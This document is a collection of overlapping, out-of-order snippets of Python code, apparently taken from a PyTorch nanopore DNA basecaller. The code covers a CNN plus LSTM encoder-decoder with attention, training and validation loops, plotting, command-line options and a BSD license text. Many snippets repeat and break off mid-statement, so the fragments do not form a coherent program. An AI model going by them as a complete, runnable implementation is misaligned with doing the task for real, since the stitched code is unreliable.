"= torch.nn.NLLLoss(ignore_index=5)#.cuda(port) print(f'The model has {count_parameters(model12):,} trainable parameters') f = open(save_files_path + \"{}_sig_length.txt\".format(fname),",
"input_biases[idx_b+2, idx] = np.linalg.norm(m[start: end], ord=2) # output gate start, end = n//2",
"equal batch size!\" def forward(self, inputs, seq_len, teacher_forcing_ratio, labels=None, lab_len=None, labels10=None, max_label_len=None, mode_type=\"train\",",
"torch.utils.data.TensorDataset(tensor_x, tensor_y, sig_len, label_len, label10, read_idx) # create your datset train_loader = torch.utils.data.DataLoader(my_dataset,",
"!= 5 # indices of not padded elements loss = criterion(reshaped_output, reshaped_sorted_labels.long()) loss_iteration.append(loss.item())",
"of output channels in Encoder-CNN\") parser.add_argument('-l', '--cnn_layers', type=int, default=1, help=\"Number of layers in",
"nn.Linear(hidden_size, 4 * hidden_size, bias=bias) self.port = port def reset_parameters(self): std = 1.0",
"bbox_inches=\"tight\") plt.close(\"all\") def plot_error_accuarcy_iterations_val(input, pdf=None, editD=True): sns.set(font_scale=1) loss_val, acc_val, editd_val = input[1], input[3],",
"forget_bias_decoder = args.forget_bias_decoder num_layers = args.lstm_layers bidir = args.bi_lstm attention = args.attention dropout",
"torch.nn.NLLLoss(ignore_index=5)#.cuda(port) print(f'The model has {count_parameters(model12):,} trainable parameters') f = open(save_files_path + \"{}_sig_length.txt\".format(fname), \"w\")",
"idx] = np.linalg.norm(m[start: end], ord=2) # cell gate start, end = n//2, n//2",
"sorted_hiddens2 = encoder_hidden[1][:, sorted_idx_target, :] sorted_hiddens = (sorted_hiddens1, sorted_hiddens2) sorted_encoder_output = ecoder_output[sorted_idx_target, :,",
"i] # batch-i, features, seq len y = y[not_padded_batches, :, :] # batch-i,",
"= 11 start = time.time() out12 = trainNet( model12, train_ds = train_set, optimizer=optimizer,",
"if earlyStopping and early_stopping.early_stop: # break epoch loop print(\"Early stopping\") break model.train() epoch_loss",
"dict_validation_loss = {} dict_training_acc = {} dict_validation_acc = {} dict_training_editd = {} dict_validation_editd",
"\", half of updates= \", int((len(train_loader) * n_epochs)*0.5)) # Backward pass loss.backward() #clipping_value",
"if self.bidirectional: if self.attention: self.lstm_unroll = nn.LSTM(self.input_dim+self.hidden_dim*2, self.hidden_dim*2, self.num_layers, batch_first=True, bidirectional=False, dropout=self.dropout) else:",
"STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT",
"acc_val, editd_train, editd_val = input[0], input[1], input[2], input[3], input[4], input[5] max_idx_train = max(acc_train,",
"torch.mean(cellgate).cpu(), torch.mean(outgate).cpu()) class LSTMencoder(nn.Module): #Our batch shape for input x is [batch, seq_len,",
"# Forward pass through LSTM layer # shape of lstm_in: [batch, seq_len, input_dim]",
"help=\"Set forget gate bias in Encoder-LSTM\") parser.add_argument('--forget_bias_decoder', type=str, default=\"0\", help=\"Set forget gate bias",
"linewidths=0.0, edgecolor=\"none\") figure = svm.get_figure() figure.savefig(save_files_path + \"/heatmap_{}.pdf\".format(filename)) plt.clf() if split_LSTMbiases: y_len_biases =",
"notice, this list of conditions and the following disclaimer. 2. Redistributions in binary",
"random_value, mode_type, beam_width=1): # Forward pass through LSTM layer # shape of lstm_in:",
"it will make a checkpoint of the current model if earlyStopping: early_stopping(np.mean(val_losses), model,",
"= 0 with torch.no_grad(): for iteration_val, data_val in enumerate(val_loader): batch_x_val = data_val[0] batch_y_val",
"PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS",
"1, 1).expand_as(x) sorted_inputs = x.gather(0, index_sorted_idx.long()) # [batch, seq_len, input_dim] # pack_padded_sequence so",
"input_y10_val = val_ds[2] signal_len_val = val_ds[3] label_len_val = val_ds[4] read_val = val_ds[5] input_x",
"* 0.95 else: teacher_forcing_ratio # Evaluation on the validation set val_losses = []",
"distance\") plt.xlabel(\"Updates\") plt.ylabel(\"Normalized Edit Distance\") plt.legend() plt.title(\"Edit Distance vs. updates\") if pdf is",
"f.write(\"best performances on trainings set\\n\") f.write(\"trainings acc\\tvalidation acc\\ttrainings loss\\tvalidation loss\\tupdate\\n\") f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\n\".format(acc_train[max_idx_train], acc_val[max_idx_train], loss_train[max_idx_train],",
"for idx, length in enumerate(target_lengths): length = int(length.item()) seq = pred[idx] seq_target =",
"own_cell_encoder self.bidirectional = bidirectional self.port = port self.dropout=dropout # Define the LSTM layer",
"reduced_TF)) f.write(\"forget gate bias encoder={}, forget gate bias decoder={}\" .format(forget_bias, forget_bias_decoder)) f.close() #",
"x = np.arange(0, len(p[epoch].detach().numpy())) # this locator puts ticks at regular intervals if",
"cellgate, outgate start, end = n//2, n # ordering ingate, forgetgate, cellgate, outgate",
"out_size return out_decoder, labels_sorted, sorted_len_target # In[ ]: def get_train_loader_trainVal(tensor_x, sig_len, tensor_y, label_len,",
"total_num_chars if updates == 0: writer.add_scalar('Loss/train', np.mean(loss_iteration), updates) writer.add_scalar('Loss/validation', np.mean(val_losses), updates) writer.add_scalar('Accuracy/train', np.mean(acc_iteration),",
"{} dict_validation_editd2 = {} dict_weights = {} dict_gradients = {} running_loss_train = 0.0",
"n updates evaluation on the validation set\") # CNN arguments parser.add_argument(\"--input_bias_cnn\", type=lambda x:bool(strtobool(x)),",
"p and \"lstm\" in p and \"linear\" not in p: n = matrix_param[p].shape[0]",
"batches that are NOT padded h = hidden[0][:, not_padded_batches, :] c = hidden[1][:,",
"if pdf is not None: pdf.savefig(fig, bbox_inches=\"tight\") plt.close(\"all\") def plot_activations(input, pdf=None, print_epoch=50000, title=\"\"):",
"np.mean(loss_iteration) dict_training_acc2[updates] = np.mean(val_losses) dict_validation_loss2[updates] = np.mean(acc_iteration) dict_validation_acc2[updates] = np.mean(val_acc) else: writer.add_scalar('Loss/train', np.mean(loss_iteration),",
"default=256, help=\"Batch size\") parser.add_argument('-e', '--epochs', type=int, default=500, help=\"Number of epochs\") parser.add_argument('-v', '--make_validation', type=int,",
"+= 1 ax = fig.add_subplot(2, 2, i) for epoch in p.keys(): if epoch",
"stopping\") parser.add_argument(\"--call\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument(\"--editD\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False)",
"param in model12.named_parameters(): if \"bias\" in name: if forget_bias != \"None\" and \"lstm_encoder\"",
"other): return self.start <= other <= self.end def make_argparser(): parser = argparse.ArgumentParser(description='Nanopore Basecaller')",
"# * LSTM-Encoder # * LSTM-Decoder # The Encoder # ----------- class LSTMCellEncoder(nn.Module):",
"self.lstm_unroll = nn.LSTM(self.input_dim+self.hidden_dim, self.hidden_dim, self.num_layers, batch_first=True, bidirectional=False, dropout=self.dropout) else: self.lstm_unroll = nn.LSTM(self.input_dim, self.hidden_dim,",
"== lstm_decoder.num_layers, \"Encoder and decoder must have equal number of layers!\" assert lstm_encoder.batch_size",
"editd_iteration = [] for iteration, data in enumerate(train_loader): model.train() #Set the parameter gradients",
"5 # indices of not padded elements loss_val = criterion(reshaped_output_val, reshaped_sorted_labels_val.long()) val_losses.append(loss_val.item()) epoch_loss_val",
":] = input_decoder # [max. target length, batch size, output dim] top1 =",
"= fig.add_subplot(1, 3, 2) ax.plot(list(acc_train.keys()), [v*100 for v in list(acc_train.values())], label=\"training accuracy\") if",
"f.write(\"\\nRead idx:\\n\") f.write(\"{}\\n\\n\".format(val_set[5])) f.write(\"Model:\\n\") f.write(str(model12)) f.write(\"\\nThe model has {:,} trainable parameters\\n\".format(count_parameters(model12))) f.write(\"hyperparameters:\\n\") f.write(\"epochs={},",
"that are NOT padded h = hidden[0][:, not_padded_batches, :] c = hidden[1][:, not_padded_batches,",
"set\\n\") f.write(\"trainings acc\\tvalidation acc\\ttrainings loss\\tvalidation loss\\tupdate\\n\") f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\n\".format(acc_train[max_idx_train], acc_val[max_idx_train], loss_train[max_idx_train], loss_val[max_idx_train], max_idx_train)) f.write(\"\\nbest performances",
"self.num_layers, batch_first=True, bidirectional=False, dropout=self.dropout) # Define the output layer if self.bidirectional: if self.attention:",
"= {} dict_activations_cell_decoder = {} dict_activations_out_decoder = {} dict_training_loss = {} dict_validation_loss =",
"LSTMCellEncoder(nn.Module): def __init__(self, input_size, hidden_size, bias=True): super(LSTMCellEncoder, self).__init__() self.input_size = input_size self.hidden_size =",
"input_x_val = val_ds[0] input_y_val = val_ds[1] input_y10_val = val_ds[2] signal_len_val = val_ds[3] label_len_val",
"(forgetgate * c) + (ingate * cellgate) hy = outgate * F.tanh(cy) return",
"x out_size x seq_length output, sorted_labels, sorted_labels_len = model(inputs, seq_len, teacher_forcing_ratio, labels, lab_len,",
"output_dim] # shape of self.hidden: (a, b), where a and b both have",
"idx] = np.linalg.norm(m, ord=2) if split_LSTMbiases and \"bias\" in p and \"lstm\" in",
"updates from validation set\") if pdf is not None: pdf.savefig(fig, bbox_inches=\"tight\") plt.close(\"all\") def",
"nn.LSTM(self.input_dim+self.hidden_dim*2, self.hidden_dim*2, self.num_layers, batch_first=True, bidirectional=False, dropout=self.dropout) else: self.lstm_unroll = nn.LSTM(self.input_dim, self.hidden_dim*2, self.num_layers, batch_first=True,",
"acc\\ttrainings loss\\tvalidation loss\\tupdate\\n\") f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\n\".format(acc_train[max_idx_train], acc_val[max_idx_train], loss_train[max_idx_train], loss_val[max_idx_train], max_idx_train)) f.write(\"\\nbest performances on validation set\\n\")",
"gradients to zero optimizer.zero_grad() batch_x = data[0] batch_y = data[1] seq_len = data[2]",
"create your dataloader return(train_loader) def get_train_loader(tensor_x, sig_len, tensor_y, label_len, label10, read_idx, batch_size, shuffle=False):",
"return hidden_original, unpacked_original # The Decoder # ----------- class LSTMCellDecoder(nn.Module): def __init__(self, input_size,",
"in list(acc_val.values())], label=\"validation accuracy\") plt.xlabel(\"Updates\") plt.ylabel(\"Accuracy in %\") plt.legend() plt.title(\"Accuracy vs. updates\") if",
"reached half of the updates teacher_forcing_ratio = teacher_forcing_ratio * 0.95 else: teacher_forcing_ratio #",
"+= len(encoded_target) return editd, num_chars def trainNet(model, train_ds, optimizer, criterion, clipping_value=None, val_ds=None, test_ds=None,",
"License Copyright (c) 2021 (<EMAIL>) All rights reserved. Redistribution and use in source",
"decoder optimizer.step() if (val_ds != None) and (updates % make_validation == 0): #",
"# forget gate start, end = n//4, n//2 # ordering ingate, forgetgate, cellgate,",
"if self.attention: self.lstm_unroll = nn.LSTM(self.input_dim+self.hidden_dim*2, self.hidden_dim*2, self.num_layers, batch_first=True, bidirectional=False, dropout=self.dropout) else: self.lstm_unroll =",
"range(n_epochs): if earlyStopping and early_stopping.early_stop: # break epoch loop print(\"Early stopping\") break model.train()",
"= output_val.view(-1, output_val.size(2)) reshaped_sorted_labels_val = sorted_labels_val.view(-1) notpadded_index_val = reshaped_sorted_labels_val != 5 # indices",
"# rest: seq, true_batch_size:max_seq_len, features filled with 0 outputs[i, 0:input_decoder.size(0), :] = input_decoder",
"sns.set(font_scale=0.4) svm = sns.heatmap(df, linewidths=0.0, edgecolor=\"none\") figure = svm.get_figure() figure.savefig(save_files_path + \"/heatmap_{}.pdf\".format(filename)) plt.clf()",
"iteration_val, data_val in enumerate(val_loader): batch_x_val = data_val[0] batch_y_val = data_val[1] seq_len_val = data_val[2]",
"with order in batch labels_sorted = labels[sorted_idx_target, :]#.gather(0, sorted_idx_lab.long()) labels10_sorted = labels10[sorted_idx_target, :,",
"{} dict_weights = {} dict_gradients = {} running_loss_train = 0.0 running_loss_val = 0.0",
"# input gate start, end = 0, n//4 input_biases[idx_b, idx] = np.linalg.norm(m[start: end],",
"matplotlib.pyplot as plt import matplotlib.ticker as ticker from matplotlib.backends.backend_pdf import PdfPages import math",
"levenshtein sys.path.insert(0, '/basecaller-modules') from early_stopping import EarlyStopping from cnn import SimpleCNN, BasicBlock, SimpleCNN_res",
"dim=1) # input_decoder: b,hidden; attn_applied: b, 1, hidden input = torch.unsqueeze(input_decoder.type(torch.FloatTensor), 1).cuda(self.port) #",
"= ed # else: # ed = 0 # ed2 = old_ed #",
"[v*100 for v in list(acc_val.values())], label=\"validation accuracy\") plt.xlabel(\"Updates\") plt.ylabel(\"Accuracy in %\") plt.legend() plt.title(\"Accuracy",
"bias in Encoder-LSTM\") parser.add_argument('--forget_bias_decoder', type=str, default=\"0\", help=\"Set forget gate bias in Decoder-LSTM\") parser.add_argument(\"--bi_lstm\",",
"input_decoder.argmax(1) # get argmax of prediction #if teacher forcing, use actual next token",
"it has, it will make a checkpoint of the current model if earlyStopping:",
"INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF",
"editD: dict_training_editd[epoch] = editd_iteration writer.close() if earlyStopping: checkpoint = torch.load(file_name) model.load_state_dict(checkpoint[\"model\"]) return ([[dict_training_loss,",
"torch.transpose(output, 0, 1).contiguous() # input for LSTM seq_length x out_size # Calculate cross",
"hspace=0.2, wspace=0.2) ax = fig.add_subplot(1, 3, 1) ax.plot(list(loss_train.keys()), list(loss_train.values()), label=\"training error\") if validation:",
"ax = fig.add_subplot(1, 3, 3) ax.plot(np.arange(0, len(np.concatenate(np.array(list(editd_val.values()))))), np.concatenate(np.array(list(editd_val.values()))), label=\"validation edit distance\") plt.xlabel(\"Updates\") plt.ylabel(\"Normalized",
"nn.utils.rnn.pack_padded_sequence(sorted_inputs, sorted_len.cpu().numpy(), batch_first=True) # Define the LSTM layer lstm_out, hidden = self.lstm(packed_seq) #",
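These encoder fragments sort the batch by true signal length, pack it so the LSTM never sees padded steps, and unpack afterwards. A minimal sketch of that pack/pad round trip, with made-up shapes:

    import torch
    import torch.nn as nn

    x = torch.randn(3, 5, 8)                   # hypothetical batch: 3 reads, max length 5, 8 features
    lengths = torch.tensor([5, 3, 2])          # true lengths, already sorted descending
    lstm = nn.LSTM(input_size=8, hidden_size=16, batch_first=True)

    packed = nn.utils.rnn.pack_padded_sequence(x, lengths, batch_first=True)
    out_packed, (h, c) = lstm(packed)          # padded positions never reach the LSTM
    out, out_len = nn.utils.rnn.pad_packed_sequence(out_packed, batch_first=True)
    # out: [3, 5, 16]; out_len recovers the original lengths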
"input[4] fig = plt.figure(figsize=(18,2)) fig.subplots_adjust(left=0, right=1, bottom=0, top=2, hspace=0.2, wspace=0.2) ax = fig.add_subplot(1,",
"1, 2) # input for LSTM batch_size x seq_length x input_size #### LSTM",
"feature) cy = torch.unsqueeze(cy, 0).cuda(self.port) # (batch, 1, feature) return hy, (hy, cy),",
"from validation set\") if pdf is not None: pdf.savefig(fig, bbox_inches=\"tight\") plt.close(\"all\") def plot_activations(input,",
"std) def forward(self, x, hidden): h, c = hidden h = h.view(h.size(0), -1)",
"dropout_probability, dropout_input = dropout_input, input_bias_cnn=input_bias_cnn) out_channels = CNN.output_channel[n_layers_cnn-1] lstm = LSTMencoder(input_dim=out_channels, hidden_dim =",
">= true_y_len[-1].item() and len(true_y_len) > 1: not_padded_batches = i < true_y_len # get",
"seq_target = target[idx] encoded_pred = [] for p in seq: if p ==",
"sklearn.preprocessing import LabelEncoder from sklearn.preprocessing import OneHotEncoder from torch.utils.tensorboard import SummaryWriter import itertools",
"output_dim=5, num_layers=2, own_cell_encoder = False, bidirectional=False, port=1, dropout=0): super(LSTMencoder, self).__init__() self.input_dim = input_dim",
"updates > int((len(train_loader) * n_epochs)*0.5) and teacher_forcing_ratio >= 0.5: if (running_acc_train / float(make_validation))",
"dict_training_editd2, dict_validation_editd2], [dict_activations_in, dict_activations_forget, dict_activations_cell, dict_activations_out], [dict_activations_in_decoder, dict_activations_forget_decoder, dict_activations_cell_decoder, dict_activations_out_decoder], [dict_weights, dict_gradients]]) def",
"0 seq_len_cnn = seq_len_cnn[negative_idx] in_lstm = in_lstm[negative_idx, : , :] # [batch, seq_len,",
"\"C\", 2: \"G\", 3: \"T\", 4: \"<EOS>\", 5: \"<PAD>\"} editd = 0 num_chars",
"fig.add_subplot(1, 3, 3) ax.plot(np.arange(0, len(np.concatenate(np.array(list(editd_train.values()))))), np.concatenate(np.array(list(editd_train.values()))), label=\"training edit distance\") plt.xlabel(\"Updates\") plt.ylabel(\"Normalized Edit Distance\")",
"of lstm_in: [batch, input_dim] # shape of lstm_out: [seq_len, batch, output_dim] # shape",
"pin_memory=False, shuffle=shuffle) # create your dataloader return(train_loader) def convert_to_string(pred, target, target_lengths): import editdistance",
"heatmap_w_b = None counter_updates_teacherForcing = 0 old_ed = 0 if reduce_lr: scheduler =",
"my_dataset = torch.utils.data.TensorDataset(tensor_x, tensor_y, sig_len, label_len, label10) # create your datset train_loader =",
"outputLen_MaxPool plt.switch_backend('agg') class Range(object): def __init__(self, start, end): self.start = start self.end =",
"h2) batch_size = true_y_len.size(0) max_for = range(max_label_len) outputs = torch.zeros(max_label_len, batch_size, self.output_dim).cuda(self.port) #",
"max_label_len=None, mode_type=\"train\", beam_width=1): ########################################### ##### Encoder ############################# ########################################### #### CNN #Forward pass, backward",
"\"Encoder and decoder must have equal batch size!\" def forward(self, inputs, seq_len, teacher_forcing_ratio,",
"input[2], input[3], input[4], input[5] max_idx_train = max(acc_train, key=lambda k: acc_train[k]) max_idx_val = max(acc_val,",
"self.lstm_unroll(input, hidden) # [batch size, seq, hidden dim] lstm_in_unroll = self.linear(lstm_in_unroll.view(-1, lstm_in_unroll.size(2))) #",
"= start self.end = end def __eq__(self, other): return self.start <= other <=",
"torch.cat((input_decoder, attn_applied.squeeze(1)), dim=1) # input_decoder: b,hidden; attn_applied: b, 1, hidden input = torch.unsqueeze(input_decoder.type(torch.FloatTensor),",
"not_padded_batches = i < true_y_len # get indices of not padded sequences true_y_len",
"of layers in Encoder-LSTM\") parser.add_argument('--forget_bias_encoder', type=str, default=\"0\", help=\"Set forget gate bias in Encoder-LSTM\")",
"arguments parser.add_argument(\"--input_bias_cnn\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=True) parser.add_argument('-c', '--channel_number', type=int, default=256, help=\"Number of",
"bidirectional=self.bidirectional, dropout=self.dropout) # self.lstm_p = nn.LSTM(self.input_dim, self.hidden_dim, self.num_layers, batch_first=True) def init_hidden(self): # This",
"Encoder-Decoder-LSTM\") parser.add_argument('--lstm_layers', type=int, default=1, help=\"Number of layers in Encoder-LSTM\") parser.add_argument('--forget_bias_encoder', type=str, default=\"0\", help=\"Set",
"# [batch, seq_len, input_dim] lab_len = lab_len[negative_idx] labels = labels[negative_idx, :] labels10 =",
"= output_dim self.own_cell_decoder = own_cell_decoder self.bidirectional = bidirectional self.port=port self.attention = attention self.dropout",
"return(train_loader) def convert_to_string(pred, target, target_lengths): import editdistance vocab = {0: \"A\", 1: \"C\",",
"= {} dict_activations_forget = {} dict_activations_cell = {} dict_activations_out = {} dict_activations_in_decoder =",
"import h5py import numpy as np import os import sys import torch import",
"= gates.chunk(4, 1) ingate = F.sigmoid(ingate) forgetgate = F.sigmoid(forgetgate) cellgate = F.tanh(cellgate) outgate",
"from cnn import SimpleCNN, BasicBlock, SimpleCNN_res from cnn import outputLen_Conv, outputLen_AvgPool, outputLen_MaxPool plt.switch_backend('agg')",
"1).expand_as(x) sorted_inputs = x.gather(0, index_sorted_idx.long()) # [batch, seq_len, input_dim] # pack_padded_sequence so that",
"* 100)) print(\"=\" * 100) dict_validation_loss[epoch] = val_losses dict_validation_acc[epoch] = val_acc if editD:",
"= (reshaped_output[notpadded_index, :].argmax(1) == reshaped_sorted_labels[notpadded_index] ).sum().item() / reshaped_sorted_labels[notpadded_index].size(0) epoch_acc += acc running_acc_train +=",
"pandas as pd import argparse from distutils.util import strtobool from polyleven import levenshtein",
"wspace=0.2) ax = fig.add_subplot(1, 3, 1) ax.plot(np.arange(0, len(np.concatenate(np.array(list(loss_val.values()))))), np.concatenate(np.array(list(loss_val.values()))), label=\"validation error\") plt.xlabel(\"Updates\") plt.ylabel(\"Error\")",
"distance\") plt.xlabel(\"Updates\") plt.ylabel(\"Normalized Edit Distance\") plt.legend() plt.title(\"Edit distance vs. updates from validation set\")",
"validation: ax.plot(list(acc_val.keys()), [v*100 for v in list(acc_val.values())], label=\"validation accuracy\") plt.xlabel(\"Updates\") plt.ylabel(\"Accuracy in %\")",
":]#.gather(0, unsorted_idx_hiddens.long()) unsorted_hiddens2 = hidden[1][:, original_idx, :]#.gather(0, unsorted_idx_hiddens.long()) hidden_original = (unsorted_hiddens1, unsorted_hiddens2)#.cpu() unpacked_original",
"editD=editD) bestPerformance2File(out12[1], save_files_path + \"best_performances_{}.txt\".format(fname), editD=editD) plot_error_accuarcy_iterations_train(out12[0], pdf, editD=editD) plot_error_accuarcy_iterations_val(out12[0], pdf, editD=editD) print(\"Training",
"validation set\") if editD: ax = fig.add_subplot(1, 3, 3) ax.plot(np.arange(0, len(np.concatenate(np.array(list(editd_val.values()))))), np.concatenate(np.array(list(editd_val.values()))), label=\"validation",
"train_set[3].size(), train_set[4].size(), train_set[5].size()) print(\"validation: \", val_set[0].size(), val_set[1].size(), val_set[2].size(), val_set[3].size(), val_set[4].size(), val_set[5].size()) # [batch",
"plt.figure(figsize=(18,2)) fig.subplots_adjust(left=0, right=1, bottom=0, top=2, hspace=0.2, wspace=0.2) ax = fig.add_subplot(1, 3, 1) ax.plot(np.arange(0,",
"sns.set(font_scale=1) loss_train, acc_train, editd_train = input[0], input[2], input[4] fig = plt.figure(figsize=(18,2)) fig.subplots_adjust(left=0, right=1,",
"4 * hidden_size, bias=bias) self.port = port def reset_parameters(self): std = 1.0 /",
"sorted_labels_len))) # ed2 = ed # else: # ed = 0 # ed2",
"fig.add_subplot(1, 3, 1) ax.plot(np.arange(0, len(np.concatenate(np.array(list(loss_train.values()))))), np.concatenate(np.array(list(loss_train.values()))), label=\"training error\") plt.xlabel(\"Updates\") plt.ylabel(\"Error\") plt.legend() plt.title(\"Error vs.",
"requires_grad=False), Variable(batch_y, requires_grad=False), Variable(batch_y10, requires_grad=False) # batch_size x out_size x seq_length output, sorted_labels,",
"sizes in Encoder-CNN\") parser.add_argument(\"--dropout_cnn\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument(\"--dropout_input\", type=lambda x:bool(strtobool(x)), nargs='?',",
"outputs[i, 0:input_decoder.size(0), :] = input_decoder # [max. target length, batch size, output dim]",
"in Encoder-CNN\") parser.add_argument('--pooling_type', default=\"None\", help=\"Pooling type in Encoder-CNN\") parser.add_argument('--strides', nargs='+', type=int, default=[1, 1,",
"__init__(self, input_size, hidden_size, bias=True): super(LSTMCellEncoder, self).__init__() self.input_size = input_size self.hidden_size = hidden_size self.bias",
"y[:, :, i] # batch, features, seq len if self.attention: # ATTENTION MECHANISM",
"# batch_size x out_size x seq_length output, sorted_labels, sorted_labels_len = model(inputs, seq_len, teacher_forcing_ratio,",
"1)) * 100)) if reduce_lr: print(\"lr= \" + str(optimizer.param_groups[0]['lr'])) print(\"teacher forcing ratio= {}\".format(teacher_forcing_ratio),",
"start, end = n//2, n//2 + n//4 input_biases[idx_b+2, idx] = np.linalg.norm(m[start: end], ord=2)",
"BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,",
"n//2 # ordering ingate, forgetgate, cellgate, outgate param.data[start:end].fill_(float(int(forget_bias))) print(start, end) # ingate start,",
"OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR",
"data_val in enumerate(val_loader): batch_x_val = data_val[0] batch_y_val = data_val[1] seq_len_val = data_val[2] lab_len_val",
"return hy, (hy, cy), (torch.mean(ingate).cpu(),torch.mean(forgetgate).cpu(), torch.mean(cellgate).cpu(), torch.mean(outgate).cpu()) class LSTMencoder(nn.Module): #Our batch shape for",
"type=int, default=[11, 11, 11], help=\"Kernel sizes in Encoder-CNN\") parser.add_argument(\"--dropout_cnn\", type=lambda x:bool(strtobool(x)), nargs='?', const=True,",
"= 0 epoch_loss_val = 0 epoch_acc_val = 0 epoch_editd_val = 0 epoch_editd =",
"import levenshtein sys.path.insert(0, '/basecaller-modules') from early_stopping import EarlyStopping from cnn import SimpleCNN, BasicBlock,",
"plt.title(\"Edit Distance vs. updates from trainings set\") if pdf is not None: pdf.savefig(fig,",
"editD=True): loss_train, loss_val, acc_train, acc_val, editd_train, editd_val = input[0], input[1], input[2], input[3], input[4],",
"= True, help=\"Output folder name\") parser.add_argument('-g', '--gpu_port', type=int, default=1, help=\"Port on GPU mode\")",
"30) print(\"loss= {0:.4f}\".format(epoch_loss / float(iteration + 1))) print(\"acc= {0:.4f} %\".format((epoch_acc / float(iteration +",
"ax.plot(np.arange(0, len(p[epoch].detach().numpy())), p[epoch].detach().numpy(), label=\"update {}\".format(epoch), color=\"#000000\", alpha=0.8) else: ax.plot(np.arange(0, len(p[epoch].detach().numpy())), p[epoch].detach().numpy(), label=\"update {}\".format(epoch))",
"sorted_hiddens1 = encoder_hidden[0][:, sorted_idx_target, :] sorted_hiddens2 = encoder_hidden[1][:, sorted_idx_target, :] sorted_hiddens = (sorted_hiddens1,",
"fname, editD=True): loss_train, loss_val, acc_train, acc_val, editd_train, editd_val = input[0], input[1], input[2], input[3],",
"> 1: not_padded_batches = i < true_y_len # get indices of not padded",
"= parser.parse_args(argv[1:]) infile = args.input fname = args.output port = args.gpu_port SEED =",
"evaluation on the validation set\") # CNN arguments parser.add_argument(\"--input_bias_cnn\", type=lambda x:bool(strtobool(x)), nargs='?', const=True,",
"print(\"shuffle=\", shuffle) if val_ds is not None: input_x_val = val_ds[0] input_y_val = val_ds[1]",
"return(train_loader) def get_train_loader(tensor_x, sig_len, tensor_y, label_len, label10, read_idx, batch_size, shuffle=False): my_dataset = torch.utils.data.TensorDataset(tensor_x,",
"strides = args.strides kernel = args.kernel cnn_out = args.channel_number #256 pooling_type = args.pooling_type",
"vs. updates from validation set\") if editD: ax = fig.add_subplot(1, 3, 3) ax.plot(np.arange(0,",
"val_set[1].size(), val_set[2].size(), val_set[3].size(), val_set[4].size(), val_set[5].size()) # [batch size] is typically chosen between 1",
"probability Encoder-CNN\") parser.add_argument(\"--batch_norm\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) # LSTM arguments parser.add_argument(\"--attention\", type=lambda",
"import editdistance vocab = {0: \"A\", 1: \"C\", 2: \"G\", 3: \"T\", 4:",
"and/or other materials provided with the distribution. THIS SOFTWARE IS PROVIDED BY THE",
"/ float(iteration + 1))) print(\"acc= {0:.4f} %\".format((epoch_acc / float(iteration + 1)) * 100))",
"and \"linear\" not in p: n = matrix_param[p].shape[0] # input gate start, end",
"model12.named_parameters(): if \"bias\" in name: if forget_bias != \"None\" and \"lstm_encoder\" in name:",
"#\"average\" n_layers_cnn = args.cnn_layers batch_normalization = args.batch_norm dropout_on = args.dropout_cnn dropout_input = args.dropout_input",
"label = y[:, :, i] # batch, features, seq len if self.attention: #",
"\"forget gate\", \"cell activation\", \"out gate\"]): i += 1 ax = fig.add_subplot(2, 2,",
"# (1, batch, feature) return hy, (hy, cy), (torch.mean(ingate).cpu(), torch.mean(forgetgate).cpu(), torch.mean(cellgate).cpu(), torch.mean(outgate).cpu()) class",
"get only batches that are NOT padded h = hidden[0][:, not_padded_batches, :] c",
"stride=strides, padding=[0,0,0], pooling=pooling_type, layers=n_layers_cnn, batch_norm=batch_normalization, dropout = dropout_on, dropout_p = dropout_probability, dropout_input =",
"distance\") plt.xlabel(\"Updates\") plt.ylabel(\"Normalized Edit Distance\") plt.legend() plt.title(\"Edit Distance vs. updates from trainings set\")",
"= True # Load data dict_classes = {0: \"A\", 1: \"C\", 2: \"G\",",
"not_padded_batches, :] c = hidden[1][:, not_padded_batches, :] hidden = (h, c) label =",
"parser.add_argument('-e', '--epochs', type=int, default=500, help=\"Number of epochs\") parser.add_argument('-v', '--make_validation', type=int, default=1000, help=\"Make every",
"return (torch.zeros(self.num_layers, self.batch_size, self.hidden_dim).requires_grad_().cuda(self.port), torch.zeros(self.num_layers, self.batch_size, self.hidden_dim).requires_grad_().cuda(self.port)) def forward(self, x, x_lengths): #hidden =",
"port=1, attention=True, dropout=0): super(LSTMdecoder, self).__init__() self.input_dim = input_dim self.hidden_dim = hidden_dim self.batch_size =",
"end def __eq__(self, other): return self.start <= other <= self.end def make_argparser(): parser",
"LSTM layer # shape of lstm_in: [batch, seq_len, input_dim] # shape of lstm_out:",
"args.forget_bias_decoder num_layers = args.lstm_layers bidir = args.bi_lstm attention = args.attention dropout = args.dropout",
"= False out_classes = 5 random.seed(SEED) np.random.seed(SEED) torch.manual_seed(SEED) torch.cuda.manual_seed(SEED) torch.backends.cudnn.deterministic = True #",
"[] editd_iteration = [] for iteration, data in enumerate(train_loader): model.train() #Set the parameter",
"label=\"validation edit distance\") plt.xlabel(\"Updates\") plt.ylabel(\"Normalized Edit Distance\") plt.legend() plt.title(\"Edit Distance vs. updates\") if",
"BasicBlock, SimpleCNN_res from cnn import outputLen_Conv, outputLen_AvgPool, outputLen_MaxPool plt.switch_backend('agg') class Range(object): def __init__(self,",
"in Encoder-LSTM\") parser.add_argument('--forget_bias_decoder', type=str, default=\"0\", help=\"Set forget gate bias in Decoder-LSTM\") parser.add_argument(\"--bi_lstm\", type=lambda",
"edgecolor=\"none\") figure2 = svm.get_figure() figure2.savefig(save_files_path + \"/heatmap_{}_biases.pdf\".format(filename)) plt.clf() def bestPerformance2File(input, fname, editD=True): loss_train,",
